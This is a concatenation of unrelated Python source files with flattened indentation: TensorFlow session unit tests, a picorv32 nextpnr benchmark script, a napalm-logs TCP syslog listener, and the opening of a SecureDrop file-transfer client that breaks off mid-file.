self.assertEqual([2.0], callable_fn(np.array(1.0, dtype=np.float32)))
def testOptimizedMakeCallableWithRunMetadata(self):
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32)
a = math_ops.add(ph, 1.0)
callable_opts = config_pb2.CallableOptions()
callable_opts.feed.append(ph.name)
callable_opts.fetch.append(a.name)
callable_opts.run_options.trace_level = config_pb2.RunOptions.FULL_TRACE
callable_fn = sess._make_callable_from_options(callable_opts)
run_metadata = config_pb2.RunMetadata()
self.assertEqual([2.0], callable_fn(np.array(1.0, dtype=np.float32),
run_metadata=run_metadata))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testFeedError(self):
with session.Session() as sess:
feed_t = array_ops.placeholder(dtype=dtypes.float32)
out_t = array_ops.identity(feed_t)
feed_val = constant_op.constant(5.0)
with self.assertRaisesRegex(TypeError, 'cannot be a tf.Tensor object'):
sess.run(out_t, feed_dict={feed_t: feed_val})
with self.assertRaisesRegex(TypeError, 'cannot be a tf.Tensor object'):
out_t.eval(feed_dict={feed_t: feed_val})
with self.assertRaisesRegex(TypeError, 'cannot be a tf.Tensor object'):
out_t.op.run(feed_dict={feed_t: feed_val})
def testFeedPrecisionLossError(self):
with session.Session() as sess:
largest_int64 = np.iinfo(np.int64).max
feed_int_implicit_int32 = constant_op.constant(1)
feed_int_explicit_int32 = constant_op.constant(1, dtype=dtypes.int32)
out_t = constant_op.constant(1.0)
with self.assertRaisesRegex(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_implicit_int32: largest_int64})
with self.assertRaisesRegex(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_explicit_int32: largest_int64})
def testStringFetch(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array(
[compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape) if size > 0 else []
c = constant_op.constant(c_list)
self.assertAllEqual(c, c_list)
def testStringFeed(self):
with session.Session() as sess:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array(
[compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape)
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape)
c = array_ops.identity(feed_t)
self.assertAllEqual(sess.run(c, feed_dict={feed_t: c_list}), c_list)
self.assertAllEqual(
sess.run(feed_t, feed_dict={
feed_t: c_list
}), c_list)
c_v, feed_v = sess.run([c, feed_t], feed_dict={feed_t: c_list})
self.assertAllEqual(c_v, c_list)
self.assertAllEqual(feed_v, c_list)
def testStringFeedWithNullCharacters(self):
with session.Session():
c_list = [b'\n\x01\x00', b'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0])
self.assertEqual(c_list[1], out[1])
def testStringFeedWithUnicode(self):
with session.Session():
c_list = [
u'\n\x01\x00', u'\n\x00\x01', u'\u26a3 unicode',
u'\U0001f60e deal with it'
]
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[len(c_list)])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
def testInvalidTargetFails(self):
with self.assertRaisesRegex(
errors.NotFoundError,
'No session factory registered for the given session options'):
session.Session('INVALID_TARGET')
def testFetchByNameDifferentStringTypes(self):
with session.Session() as sess:
c = constant_op.constant(42.0, name='c')
d = constant_op.constant(43.0, name=u'd')
e = constant_op.constant(44.0, name=b'e')
f = constant_op.constant(45.0, name=r'f')
self.assertTrue(isinstance(c.name, six.text_type))
self.assertTrue(isinstance(d.name, six.text_type))
self.assertTrue(isinstance(e.name, six.text_type))
self.assertTrue(isinstance(f.name, six.text_type))
self.assertEqual(42.0, sess.run('c:0'))
self.assertEqual(42.0, sess.run(u'c:0'))
self.assertEqual(42.0, sess.run(b'c:0'))
self.assertEqual(42.0, sess.run(r'c:0'))
self.assertEqual(43.0, sess.run('d:0'))
self.assertEqual(43.0, sess.run(u'd:0'))
self.assertEqual(43.0, sess.run(b'd:0'))
self.assertEqual(43.0, sess.run(r'd:0'))
self.assertEqual(44.0, sess.run('e:0'))
self.assertEqual(44.0, sess.run(u'e:0'))
self.assertEqual(44.0, sess.run(b'e:0'))
self.assertEqual(44.0, sess.run(r'e:0'))
self.assertEqual(45.0, sess.run('f:0'))
self.assertEqual(45.0, sess.run(u'f:0'))
self.assertEqual(45.0, sess.run(b'f:0'))
self.assertEqual(45.0, sess.run(r'f:0'))
def testIncorrectGraph(self):
with ops.Graph().as_default() as g_1:
c_1 = constant_op.constant(1.0, name='c')
with ops.Graph().as_default() as g_2:
c_2 = constant_op.constant(2.0, name='c')
self.assertEqual('c', c_1.op.name)
self.assertEqual('c', c_2.op.name)
with session.Session(graph=g_1) as sess_1:
self.assertEqual(1.0, sess_1.run(c_1))
with self.assertRaises(ValueError):
sess_1.run(c_2)
with self.assertRaises(ValueError):
sess_1.run(c_2.op)
with session.Session(graph=g_2) as sess_2:
with self.assertRaises(ValueError):
sess_2.run(c_1)
with self.assertRaises(ValueError):
sess_2.run(c_1.op)
self.assertEqual(2.0, sess_2.run(c_2))
def testFeedDictKeyException(self):
with session.Session() as sess:
a = constant_op.constant(1.0, dtypes.float32, name='a')
with self.assertRaisesRegex(TypeError, 'Cannot interpret feed_dict'):
sess.run(a, feed_dict={'a': [2.0]})
@test_util.run_deprecated_v1
def testPerStepTrace(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.SOFTWARE_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
sess.run(constant_op.constant(1.0))
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
# in v2 mode, this len is 2
self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)
@test_util.run_deprecated_v1
def testRunOptionsRunMetadata(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.SOFTWARE_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
# all combinations are valid
sess.run(constant_op.constant(1.0), options=None, run_metadata=None)
sess.run(
constant_op.constant(1.0), options=None, run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0), options=run_options, run_metadata=None)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
# in v2 mode, this len is 2
self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)
def testFeedShapeCompatibility(self):
with session.Session() as sess:
some_tensor = constant_op.constant([2.0, 2.0, 2.0, 2.0])
new_shape = constant_op.constant([2, 2])
reshaped_tensor = array_ops.reshape(some_tensor, new_shape)
with self.assertRaisesRegex(ValueError, 'Cannot feed value of shape'):
sess.run(reshaped_tensor, feed_dict={some_tensor: [1.0, 2.0, 3.0]})
with self.assertRaisesRegex(
errors.InvalidArgumentError,
'Input to reshape is a tensor with 4 values, '
'but the requested shape has 21'):
sess.run(reshaped_tensor, feed_dict={new_shape: [3, 7]})
def testInferShapesFalse(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session()
self.assertFalse('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testInferShapesTrue(self):
config_pb = config_pb2.ConfigProto(
graph_options=config_pb2.GraphOptions(infer_shapes=True))
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session(config=config_pb)
self.assertTrue('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testBuildCostModel(self):
run_options = config_pb2.RunOptions()
config_pb = config_pb2.ConfigProto(
allow_soft_placement=True,
graph_options=config_pb2.GraphOptions(build_cost_model=100))
with session.Session(config=config_pb) as sess:
with ops.device('/device:GPU:0'):
a = array_ops.placeholder(dtypes.float32, shape=[])
b = math_ops.add(a, a)
c = array_ops.identity(b)
d = math_ops.multiply(c, c)
for step in xrange(120):
run_metadata = config_pb2.RunMetadata()
sess.run(
d,
feed_dict={a: 1.0},
options=run_options,
run_metadata=run_metadata)
if step == 99:
self.assertTrue(run_metadata.HasField('cost_graph'))
else:
self.assertFalse(run_metadata.HasField('cost_graph'))
def runTestOutputPartitionGraphs(self, sess):
run_options = config_pb2.RunOptions(output_partition_graphs=True)
a = constant_op.constant(1)
run_metadata = config_pb2.RunMetadata()
sess.run(a, options=run_options, run_metadata=run_metadata)
self.assertGreater(len(run_metadata.partition_graphs), 0)
sess.run(a, run_metadata=run_metadata)
self.assertEqual(len(run_metadata.partition_graphs), 0)
@test_util.run_v1_only('b/120545219')
def testOutputPartitionGraphsDirect(self):
self.runTestOutputPartitionGraphs(session.Session())
@test_util.run_v1_only('b/120545219')
def testOutputPartitionGraphsDistributed(self):
server = server_lib.Server.create_local_server()
self.runTestOutputPartitionGraphs(session.Session(server.target))
def testNonInteractiveSessionNesting(self):
sess1 = session.Session()
sess1_controller = sess1.as_default()
sess1_controller.__enter__()
sess2 = session.Session()
sess2_controller = sess2.as_default()
sess2_controller.__enter__()
with self.assertRaisesRegex(AssertionError, 'Nesting violated'):
sess1_controller.__exit__(None, None, None)
ops._default_session_stack.reset()
def testInteractiveSessionNesting(self):
sess1 = session.InteractiveSession()
sess2 = session.InteractiveSession()
del sess1
del sess2
@test_util.run_v1_only('b/120545219')
def testAsDefault(self):
c = constant_op.constant(37)
sess = session.Session()
with sess.as_default():
self.assertEqual(37, c.eval())
# Ensure that the session remains valid even when it is not captured.
with session.Session().as_default():
self.assertEqual(37, c.eval())
def testReentry(self):
sess = session.Session()
with self.assertRaisesRegex(RuntimeError, 'not re-entrant'):
with sess:
with sess:
pass
def testInvalidArgument(self):
with self.assertRaisesRegex(TypeError, 'target must be a string'):
session.Session(37)
with self.assertRaisesRegex(TypeError, 'config must be a tf.ConfigProto'):
session.Session(config=37)
with self.assertRaisesRegex(TypeError, 'graph must be a tf.Graph'):
session.Session(graph=37)
@test_util.run_v1_only('b/120545219')
def testTimeoutWithShortOperations(self):
num_epochs = 5
q = data_flow_ops.FIFOQueue(capacity=50, dtypes=[dtypes.int32], shapes=[()])
enqueue_op = q.enqueue_many(constant_op.constant([1, 2]))
# Use a 10-second timeout, which should be longer than any
# non-blocking enqueue_many op.
config_pb = config_pb2.ConfigProto(operation_timeout_in_ms=10000)
with session.Session(config=config_pb) as sess:
for _ in range(num_epochs):
sess.run(enqueue_op)
self.assertEqual(sess.run(q.size()), num_epochs * 2)
@test_util.run_v1_only('b/120545219')
def testRegisterFetchAndFeedConversionFunctions(self):
class SquaredTensor(object):
def __init__(self, tensor):
self.sq = math_ops.square(tensor)
fetch_fn = lambda squared_tensor: ([squared_tensor.sq], lambda val: val[0])
feed_fn1 = lambda feed, feed_val: [(feed.sq, feed_val)]
feed_fn2 = lambda feed: [feed.sq]
session.register_session_run_conversion_functions(SquaredTensor, fetch_fn,
feed_fn1, feed_fn2)
with self.assertRaises(ValueError):
session.register_session_run_conversion_functions(SquaredTensor, fetch_fn,
feed_fn1, feed_fn2)
with self.cached_session() as sess:
np1 = np.array([1.0, 1.5, 2.0, 2.5])
np2 = np.array([3.0, 3.5, 4.0, 4.5])
squared_tensor = SquaredTensor(np2)
squared_eval = sess.run(squared_tensor)
self.assertAllClose(np2 * np2, squared_eval)
squared_eval = sess.run(
squared_tensor, feed_dict={
squared_tensor: np1 * np1
})
self.assertAllClose(np1 * np1, squared_eval)
partial_run = sess.partial_run_setup([squared_tensor], [])
squared_eval = sess.partial_run(partial_run, squared_tensor)
self.assertAllClose(np2 * np2, squared_eval)
def testDefaultLogDevicePlacement(self):
class CaptureStderr(str):
"""Class to capture stderr from C++ shared library."""
def __enter__(self):
self._esc = compat.as_str('\b')
self._output = compat.as_str('')
self._stderr = sys.stderr
self._fd = self._stderr.fileno()
self._out_pipe, in_pipe = os.pipe()
# Save the original io stream.
self._dup_fd = os.dup(self._fd)
# Replace the original io stream with in pipe.
os.dup2(in_pipe, self._fd)
return self
def __exit__(self, *args):
self._stderr.write(self._esc)
self._stderr.flush()
self.read()
os.close(self._out_pipe)
# Restore the original io stream.
os.dup2(self._dup_fd, self._fd)
def read(self):
while True:
data = os.read(self._out_pipe, 1)
if not data or compat.as_str(data) == self._esc:
break
self._output += compat.as_str(data)
def __str__(self):
return self._output
context.set_log_device_placement(True)
if context.executing_eagerly():
with CaptureStderr() as log:
a = constant_op.constant(1)
b = constant_op.constant(2)
c = a + b
        # Ensure that executing the same kernel again with the same arguments
        # is also logged.
d = a + b
else:
# Passing the config to the server, but not the session should still
# result in logging device placement.
config_pb = config_pb2.ConfigProto(log_device_placement=True)
server = server_lib.Server.create_local_server(config=config_pb)
a = constant_op.constant(1)
b = constant_op.constant(2)
c = a + b
d = a + b
with session.Session(server.target) as sess:
with CaptureStderr() as log:
c, d = sess.run([c, d])
self.assertEqual(c, 3)
self.assertEqual(d, 3)
# Ensure that we did log device placement.
add_executions = [l for l in str(log).splitlines() if 'AddV2' in l]
self.assertEqual(len(add_executions), 2)
@def_function.function
def fn():
a = constant_op.constant(1)
b = constant_op.constant(2)
c = a + b
d = a + b
return c, d
with CaptureStderr() as log:
c, d = self.evaluate(fn())
self.assertEqual(c, 3)
self.assertEqual(d, 3)
# Ensure that we did log device placement.
add_executions = [l for l in str(log).splitlines() if 'AddV2' in l]
self.assertEqual(len(add_executions), 2)
@test_util.run_v1_only('b/120545219')
def testLocalMasterSessionTimeout(self):
# Test that the timeout passed in a config to the session works correctly.
config_pb = config_pb2.ConfigProto(operation_timeout_in_ms=1000)
server = server_lib.Server.create_local_server()
q = data_flow_ops.FIFOQueue(1, dtypes.float32)
dequeued_t = q.dequeue()
with session.Session(server.target, config=config_pb) as sess:
# Intentionally do not run any enqueue_ops so that dequeue will block
# until operation_timeout_in_ms.
with self.assertRaises(errors.DeadlineExceededError):
sess.run(dequeued_t)
@test_util.run_v1_only('b/120545219')
def testDefaultServerTimeout(self):
# Test that the default server config timeout gets used when no Session
# config is provided.
config_pb = config_pb2.ConfigProto(operation_timeout_in_ms=1000)
server = server_lib.Server.create_local_server(config=config_pb)
q = data_flow_ops.FIFOQueue(1, dtypes.float32)
dequeued_t = q.dequeue()
with session.Session(server.target) as sess:
# Intentionally do not run any enqueue_ops so that dequeue will block
# until operation_timeout_in_ms.
with self.assertRaises(errors.DeadlineExceededError):
sess.run(dequeued_t)
def runTestBuildGraphError(self, sess):
# Ensure that errors from building the graph get propagated.
data = array_ops.placeholder(dtypes.float32, shape=[])
# pylint: disable=protected-access
enter_1 = gen_control_flow_ops.enter(data, 'foo_1', False)
enter_2 = gen_control_flow_ops.enter(data, 'foo_2', False)
# pylint: enable=protected-access
res = math_ops.add(enter_1, enter_2)
with self.assertRaisesOpError('has inputs from different frames'):
sess.run(res, feed_dict={data: 1.0})
@test_util.run_v1_only('b/120545219')
def testBuildGraphErrorDirect(self):
self.runTestBuildGraphError(session.Session())
@test_util.run_v1_only('b/120545219')
def testBuildGraphErrorDist(self):
server = server_lib.Server.create_local_server()
self.runTestBuildGraphError(session.Session(server.target))
def testDeviceAttributes(self):
attrs = session._DeviceAttributes(
'/job:worker/replica:0/task:3/device:CPU:2', 'TYPE', 1337, 1000000)
self.assertEqual(1337, attrs.memory_limit_bytes)
self.assertEqual('/job:worker/replica:0/task:3/device:CPU:2', attrs.name)
self.assertEqual('TYPE', attrs.device_type)
self.assertEqual(1000000, attrs.incarnation)
str_repr = '%s' % attrs
self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr)
def testDeviceAttributesCanonicalization(self):
attrs = session._DeviceAttributes('/job:worker/replica:0/task:3/cpu:1',
'TYPE', 1337, 1000000)
self.assertEqual(1337, attrs.memory_limit_bytes)
self.assertEqual('/job:worker/replica:0/task:3/device:CPU:1', attrs.name)
self.assertEqual('TYPE', attrs.device_type)
self.assertEqual(1000000, attrs.incarnation)
str_repr = '%s' % attrs
self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr)
def runTestAddFunctionToSession(self, target=''):
"""Add a function to a session after the graph has already been run."""
@function.Defun(dtypes.float32)
def foo(x):
return x + 1
x = constant_op.constant(1.0)
with session.Session(target=target) as sess:
sess.run(x)
f = foo(x)
result = sess.run(f)
self.assertEqual(result, 2.0)
@test_util.run_v1_only('b/120545219')
def testAddFunctionToSession(self):
self.runTestAddFunctionToSession()
@test_util.run_v1_only('b/120545219')
def testAddFunctionToGrpcSession(self):
server = server_lib.Server.create_local_server()
self.runTestAddFunctionToSession(server.target)
def testOpenAndCloseGrpcSession(self):
server = server_lib.Server.create_local_server()
with session.Session(server.target):
pass
def testOpenAndCloseSession(self):
with session.Session():
pass
@test_util.run_v1_only('b/120545219')
def testAutoConvertAndCheckData(self):
with self.cached_session() as sess:
a = array_ops.placeholder(dtype=dtypes.string)
with self.assertRaisesRegex(
TypeError, r'Type of feed value 1 with type <(\w+) \'int\'> is not'):
sess.run(a, feed_dict={a: 1})
@test_util.run_v1_only('b/120545219')
def testOptimizerOptions(self):
config.set_optimizer_experimental_options({'min_graph_nodes': -1})
with ops.Graph().as_default():
sess = session.Session()
self.assertEqual(
sess._config.graph_options.rewrite_options.min_graph_nodes, -1)
if __name__ == '__main__':
googletest.main()
|
picorv32_benchmark.py
|
#!/usr/bin/env python3
import os, sys, threading
from os import path
import subprocess
import re
num_runs = 8
if not path.exists("picorv32.json"):
subprocess.run(["wget", "https://raw.githubusercontent.com/cliffordwolf/picorv32/master/picorv32.v"], check=True)
subprocess.run(["yosys", "-q", "-p", "synth_ice40 -json picorv32.json -top top", "picorv32.v", "picorv32_top.v"], check=True)
fmax = {}
if not path.exists("picorv32_work"):
os.mkdir("picorv32_work")
threads = []
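# Each worker thread place-and-routes the same netlist with a different seed; successful
# runs record the icetime-reported fmax in the shared dict, keyed by seed number.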
for i in range(num_runs):
def runner(run):
ascfile = "picorv32_work/picorv32_s{}.asc".format(run)
if path.exists(ascfile):
os.remove(ascfile)
result = subprocess.run(["../nextpnr-ice40", "--hx8k", "--seed", str(run), "--json", "picorv32.json", "--asc", ascfile, "--freq", "40", "--opt-timing"], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
if result.returncode != 0:
print("Run {} failed!".format(run))
else:
icetime_res = subprocess.check_output(["icetime", "-d", "hx8k", ascfile])
fmax_m = re.search(r'\(([0-9.]+) MHz\)', icetime_res.decode('utf-8'))
fmax[run] = float(fmax_m.group(1))
threads.append(threading.Thread(target=runner, args=[i+1]))
for t in threads: t.start()
for t in threads: t.join()
fmax_min = min(fmax.values())
fmax_max = max(fmax.values())
fmax_avg = sum(fmax.values()) / len(fmax)
print("{}/{} runs passed".format(len(fmax), num_runs))
print("icetime: min = {} MHz, avg = {} MHz, max = {} MHz".format(fmax_min, fmax_avg, fmax_max))
|
tcp.py
|
# -*- coding: utf-8 -*-
'''
Syslog TCP listener for napalm-logs.
'''
from __future__ import absolute_import
from __future__ import unicode_literals
# Import python stdlib
import re
import time
import random
import socket
import logging
import threading
try:
import Queue as queue
except ImportError:
import queue
# Import third party libs
# Import napalm-logs pkgs
from napalm_logs.config import TIMEOUT
from napalm_logs.config import BUFFER_SIZE
from napalm_logs.config import REUSE_PORT
from napalm_logs.config import MAX_TCP_CLIENTS
from napalm_logs.listener.base import ListenerBase
# exceptions
from napalm_logs.exceptions import BindException
from napalm_logs.exceptions import ListenerException
log = logging.getLogger(__name__)
OCTET_FRAMING_RGX = r'\d+\s(<\d+>)'
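# Octet-counted framing (RFC 6587) prefixes every syslog message with its length in
# bytes, e.g. '83 <34>...'. Splitting on this pattern with a capturing group keeps the
# '<PRI>' tokens so they can be re-paired with their message bodies in _client_connection.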
class TCPListener(ListenerBase):
'''
TCP syslog listener class
'''
def __init__(self, address, port, **kwargs):
if kwargs.get('address'):
self.address = kwargs['address']
else:
self.address = address
if kwargs.get('port'):
self.port = kwargs['port']
else:
self.port = port
self.buffer_size = kwargs.get('buffer_size', BUFFER_SIZE)
self.reuse_port = kwargs.get('reuse_port', REUSE_PORT)
self.socket_timeout = kwargs.get('socket_timeout', TIMEOUT)
self.max_clients = kwargs.get('max_clients', MAX_TCP_CLIENTS)
self.framing = kwargs.get('framing', 'traditional')
self.frame_delimiter = kwargs.get('frame_delimiter', '\n')
self.buffer = queue.Queue()
def _client_connection(self, conn, addr):
'''
        Handle the connection with one client.
'''
log.debug('Established connection with %s:%d', addr[0], addr[1])
conn.settimeout(self.socket_timeout)
try:
prev_msg = ''
while self.__up:
msg = conn.recv(self.buffer_size)
if not msg:
# log.debug('Received empty message from %s', addr)
# disabled ^ as it was too noisy
continue
log.debug('[%s] Received %s from %s', time.time(), msg, addr)
messages = []
if isinstance(msg, bytes):
msg = msg.decode('utf-8')
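                # Traditional (delimiter-based) framing: a recv() chunk may end in the
                # middle of a message, so the trailing partial line is kept in prev_msg
                # and prepended to the next chunk.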
if self.framing == 'traditional':
msg = prev_msg + msg
msg_lines = msg.split(self.frame_delimiter)
if len(msg_lines) > 1:
for line in msg_lines[:-1]:
messages.append(line)
prev_msg = msg_lines[-1]
else:
messages = [msg]
elif self.framing == 'octet-counted':
msg_chunks = re.split(OCTET_FRAMING_RGX, msg)
messages = [
'{}{}'.format(pri, body).strip()
for pri, body in zip(msg_chunks[1::2], msg_chunks[2::2])
]
for message in messages:
log.debug('[%s] Queueing %s', time.time(), message)
self.buffer.put((message, '{}:{}'.format(addr[0], addr[1])))
except socket.timeout:
if not self.__up:
return
log.info('Connection %s:%d timed out', addr[0], addr[1])
finally:
log.debug('Closing connection with %s', addr)
conn.close()
def _serve_clients(self):
'''
        Accept clients and serve, one separate thread per client.
'''
self.__up = True
while self.__up:
log.debug('Waiting for a client to connect')
try:
conn, addr = self.skt.accept()
log.debug('Received connection from %s:%d', addr[0], addr[1])
except socket.error as error:
if not self.__up:
return
msg = 'Received listener socket error: {}'.format(error)
log.error(msg, exc_info=True)
raise ListenerException(msg)
client_thread = threading.Thread(target=self._client_connection, args=(conn, addr,))
client_thread.start()
def start(self):
'''
Start listening for messages.
'''
log.debug('Creating the TCP server')
if ':' in self.address:
self.skt = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
self.skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if self.reuse_port:
self.skt.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if hasattr(socket, 'SO_REUSEPORT'):
self.skt.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
else:
log.error('SO_REUSEPORT not supported')
try:
self.skt.bind((self.address, int(self.port)))
except socket.error as msg:
error_string = 'Unable to bind to port {} on {}: {}'.format(self.port, self.address, msg)
log.error(error_string, exc_info=True)
raise BindException(error_string)
log.debug('Accepting max %d parallel connections', self.max_clients)
self.skt.listen(self.max_clients)
self.thread_serve = threading.Thread(target=self._serve_clients)
self.thread_serve.start()
def receive(self):
'''
Return one message dequeued from the listen buffer.
'''
while self.buffer.empty() and self.__up:
# This sequence is skipped when the buffer is not empty.
sleep_ms = random.randint(0, 1000)
            # log.debug('The message queue is empty, waiting %d milliseconds', sleep_ms)
# disabled ^ as it was too noisy
time.sleep(sleep_ms / 1000.0)
if not self.buffer.empty():
return self.buffer.get(block=False)
return '', ''
def stop(self):
'''
Closing the socket.
'''
log.info('Stopping the TCP listener')
self.__up = False
try:
self.skt.shutdown(socket.SHUT_RDWR)
except socket.error:
log.error('The following error may not be critical:', exc_info=True)
self.skt.close()
|
client.py
|
#!/usr/bin/env python3
import getpass
import json
import os
import select
import sys
import time
from multiprocessing import Process, shared_memory, Lock
from threading import Thread
import nest_asyncio
from securedrop import utils
from securedrop.List_Contacts_Packets import ListContactsPackets
from securedrop.List_Contacts_Response_Packets import ListContactsResponsePackets
from securedrop.add_contact_packets import AddContactPackets
from securedrop.client_server_base import ClientBase
from securedrop.file_transfer_packets import FileTransferRequestPackets, FileTransferRequestResponsePackets, \
FileTransferCheckRequestsPackets, FileTransferAcceptRequestPackets, FileTransferSendTokenPackets, \
FileTransferSendPortPackets, FileTransferSendPortTokenPackets, FILE_TRANSFER_P2P_CHUNK_SIZE
from securedrop.login_packets import LoginPackets
from securedrop.p2p import P2PClient, P2PServer
from securedrop.register_packets import RegisterPackets
from securedrop.status_packets import StatusPackets
from securedrop.utils import sha256_file, sizeof_fmt
from securedrop.utils import validate_and_normalize_email
DEFALT_SERVER_CERT_PATH = 'server.pem'
DEFAULT_FILENAME = 'client.json'
LIST_CONTACTS_TEST_FILENAME = 'list_contacts_test.json'
DEFAULT_HOSTNAME = '127.0.0.1'
DEFAULT_PORT = 6969
DEBUG_DEFAULT = False
DEBUG = False
class RegisteredUsers:
def __init__(self, filename):
self.filename = filename
self.users = set()
if os.path.exists(self.filename):
with open(self.filename, 'r') as f:
self.users = set(json.load(f))
def make_json(self):
return list(self.users)
def write_json(self):
with open(self.filename, 'w') as f:
json.dump(self.make_json(), f)
def register_prompt(self):
name = input("Enter Full Name: ")
email = input("Enter Email Address: ")
valid_email = validate_and_normalize_email(email)
if valid_email is None:
raise RuntimeError("Invalid Email Address.")
if valid_email in self.users:
raise RuntimeError("That email already exists!")
pw1 = getpass.getpass(prompt="Enter Password: ")
pw2 = getpass.getpass(prompt="Re-enter password: ")
if pw1 != pw2:
raise RuntimeError("The two entered passwords don't match!")
# enforce password length to min of 12 characters
if len(pw1) < 12:
raise RuntimeError("Password is too short! Password must be at least 12 characters")
if not name or not valid_email or not pw1:
raise RuntimeError("Empty input")
return name, valid_email, pw1
def register_user(self, email):
self.users.add(email)
self.write_json()
print("User registered.")
def login_prompt(self):
email = input("Enter Email Address: ")
password = getpass.getpass(prompt="Enter Password: ")
return email, password
class Client(ClientBase):
users: RegisteredUsers
def __init__(self, host: str, prt: int, filename):
super().__init__(host, prt)
self.filename = filename
try:
self.users = RegisteredUsers(filename)
self.user = None
except Exception as e:
print("Exiting SecureDrop")
raise e
async def main(self, server_cert_path=DEFALT_SERVER_CERT_PATH):
try:
await super().main()
if not self.users.users:
decision = input(
"No users are registered with this client.\nDo you want to register a new user (y/n)? ")
if str(decision) == 'y':
self.user = await self.register()
if self.user:
await self.sh()
else:
raise RuntimeError("Registration failed.")
else:
raise RuntimeError("You must register a user before using securedrop")
else:
self.user = await self.login()
if self.user:
await self.sh()
else:
raise RuntimeError("Login failed.")
except KeyboardInterrupt:
pass
finally:
print("Exiting SecureDrop")
async def register(self):
msg, email = None, None
try:
name, email, pw = self.users.register_prompt()
await self.write(bytes(RegisterPackets(name, email, pw)))
msg = StatusPackets(data=(await self.read())[4:]).message
if msg != "":
raise RuntimeError(msg)
self.users.register_user(email)
except RuntimeError as e:
msg = str(e)
if msg != "":
print("Failed to register: ", msg)
return None
return email
async def login(self):
msg, email = None, None
try:
email, pw = self.users.login_prompt()
await self.write(bytes(LoginPackets(email, pw)))
msg = StatusPackets(data=(await self.read())[4:]).message
if msg != "":
raise RuntimeError(msg)
except RuntimeError as e:
msg = str(e)
if msg != "":
print("Failed to login: ", msg)
return None
return email
async def sh(self):
try:
print("Welcome to SecureDrop")
print("Type \"help\" For Commands")
prompt = True
while True:
if prompt:
print("secure_drop> ", end="", flush=True)
prompt = False
if select.select([sys.stdin], [], [], 1)[0]:
cmd = input().strip()
if cmd == "help":
print("\"add\" \t-> Add a new contact")
print("\"list\" \t-> List all online contacts")
print("\"send\" \t-> Transfer file to contact")
print("\"exit\" \t-> Exit SecureDrop")
elif cmd == "add":
await self.add_contact()
elif cmd == "list":
await self.list_contacts()
elif cmd == "send":
await self.send_file()
elif cmd == "exit":
break
else:
print("Unknown command: {}".format(cmd))
prompt = True
if (await self.check_for_file_transfer_requests()) is not None:
prompt = True
        except (Exception, KeyboardInterrupt) as e:
print("Exiting SecureDrop")
raise e
async def add_contact(self):
msg = None
try:
name = input("Enter Full Name: ")
email = input("Enter Email Address: ")
valid_email = validate_and_normalize_email(email)
if valid_email is None:
raise RuntimeError("Invalid Email Address.")
if not name:
raise RuntimeError("Empty name input.")
await self.write(bytes(AddContactPackets(name, valid_email)))
msg = StatusPackets(data=(await self.read())[4:]).message
if msg != "":
raise RuntimeError(msg)
except RuntimeError as e:
msg = str(e)
if msg != "":
print("Failed to add contact: ", msg)
async def list_contacts(self):
msg = ""
try:
await self.write(bytes(ListContactsPackets()))
contact_dict = ListContactsResponsePackets(data=(await self.read())[4:]).contacts
# print contacts by Email and Name
if len(contact_dict) > 0:
print("Email:\t\t\t\tName:")
for email, name in contact_dict.items():
print(email + "\t\t\t" + name)
else:
print("No contacts online!")
if DEBUG:
try:
with open(LIST_CONTACTS_TEST_FILENAME, 'w') as f:
json.dump(contact_dict, f)
except RuntimeError as e:
msg = str(e)
except RuntimeError as e:
msg = str(e)
if msg != "":
print("Failed to list contacts: ", msg)
# Y
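    # Y is the receiving peer in the transfer protocol below: it polls the server for
    # pending requests and, if the user accepts one, starts a local P2P server process
    # to receive the file directly from the sender.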
